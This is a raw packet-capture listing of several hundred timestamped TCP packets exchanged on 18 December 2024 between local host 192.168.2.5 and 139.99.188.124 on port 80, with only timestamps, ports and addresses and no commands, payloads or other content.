                                                                    Dec 18, 2024 09:13:21.396929979 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.398611069 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.398732901 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.398781061 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.401248932 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.401344061 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.401407003 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.404000044 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.404058933 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.404103041 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.406528950 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.406583071 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.406588078 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.409149885 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.409198046 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.409277916 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.411756992 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.411815882 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.411848068 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.414390087 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.414482117 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.415148973 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.417005062 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.417073965 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.417112112 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.419656992 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.419725895 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.419753075 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.422310114 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.422369003 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.422373056 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.424904108 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.425010920 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.425080061 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.427536964 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.427644968 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.427687883 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.430164099 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.430277109 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.430346012 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.432801962 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.432912111 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.432941914 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.435445070 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.435545921 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.435570955 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.438069105 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.438142061 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.438178062 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.440664053 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.440784931 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.440913916 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.443305969 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.443440914 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.443797112 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.445980072 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.446083069 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.446120977 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.448570967 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.448635101 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.448668003 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.451206923 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.451262951 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.451351881 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.453844070 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.453908920 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.454025030 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.456458092 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.456535101 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.456577063 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.459095001 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.459181070 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.459203005 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.461703062 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.461760998 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.461894989 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.464374065 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.464443922 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.464456081 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.466995001 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.467048883 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.467082024 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.469603062 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.469691038 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.469711065 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.472248077 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.472340107 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.472374916 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.474880934 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.474952936 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.474984884 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.477505922 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.477591991 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.477612972 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.480191946 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.480315924 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.480340004 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.482809067 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.482861042 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.482897043 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.485373974 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.485430956 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.485496044 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.488001108 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.488054991 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.488154888 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.490636110 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.490683079 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.490756989 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.493273973 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.493319988 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.493356943 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.495906115 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.495948076 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.496218920 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.498564005 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.498675108 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.498708963 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.501194000 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.501245022 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.501269102 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.503799915 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.503895044 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.503987074 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.506422043 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.506480932 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.506525993 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.509037971 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.509100914 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.509195089 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.511677980 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.511779070 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.511796951 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.514336109 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.514415026 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.514560938 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.517000914 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.517045021 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.517077923 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.519558907 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.519675970 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.519752026 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.522161961 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.522357941 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.546623945 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.546782970 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.546895981 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.602793932 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.602853060 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.603003979 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.603369951 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.603507996 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.603652954 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.604248047 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.604371071 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.604438066 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.605398893 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.605611086 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.606158018 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.606558084 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.606677055 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.606770039 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.607742071 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.607850075 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.607902050 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.608922958 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.609081030 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.609230995 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.610102892 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.610214949 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.610276937 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.611269951 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.611371994 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.611493111 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.612479925 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.612580061 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.612641096 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.613650084 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.613750935 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.613954067 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.614815950 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.614881039 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.614942074 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.615950108 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.616168976 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.616420031 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.617166996 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.617233038 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.617306948 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.618259907 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.618352890 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.618412971 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.619436026 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.619514942 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.619659901 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.620526075 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.620615959 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.620827913 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.621692896 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.621794939 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.622350931 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.622829914 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.622934103 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.623004913 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.623977900 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.624094009 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.624141932 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.625111103 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.625227928 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.625297070 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.626269102 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.626403093 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.626457930 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.627396107 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.627511024 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.627686024 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.628495932 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.628603935 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.628778934 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.629653931 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.629847050 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.630002022 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.630753040 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.630857944 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.631345034 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.631882906 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.631983042 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.632086992 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.633008003 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.633127928 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.633210897 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.634144068 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.634325027 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.634382010 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.635350943 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.635416031 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.635559082 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.636434078 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.636603117 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.636773109 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.637505054 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.637615919 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.637666941 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.638653040 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.638816118 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.638904095 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.639770031 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.639919043 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.640580893 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.640825033 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.640918970 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.641138077 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.641942024 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.642049074 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.642122030 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.642843008 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.642968893 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.643134117 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.643769979 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.643860102 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.644159079 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.644674063 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.644757986 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.645255089 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.645598888 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.645685911 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.645900965 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.646545887 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.646770954 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.646887064 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.647449970 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.647579908 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.647669077 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.648402929 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.648468018 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.648644924 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.649298906 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.649440050 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.649830103 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.650249004 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.650348902 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.650763988 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.651128054 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.651236057 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.651395082 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.652050018 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.652172089 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.652508974 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.652978897 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.653100967 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.653971910 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.654066086 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.654216051 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.654805899 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.655039072 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.655744076 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.655769110 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.655800104 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.656014919 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.656647921 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.656764984 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.656841040 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.657557964 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.657651901 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.657773972 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.658483028 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.658570051 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.658660889 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.794331074 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.794415951 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.794508934 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.794692993 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.794805050 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.794922113 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.795592070 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.795706034 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.795763969 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.796430111 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.796621084 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.796684027 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.797290087 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.797427893 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.797549963 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.798154116 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.798304081 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.798369884 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.799031019 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.799132109 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.799225092 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.799906969 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.800005913 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.800065041 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.800755978 CET8049729139.99.188.124192.168.2.5
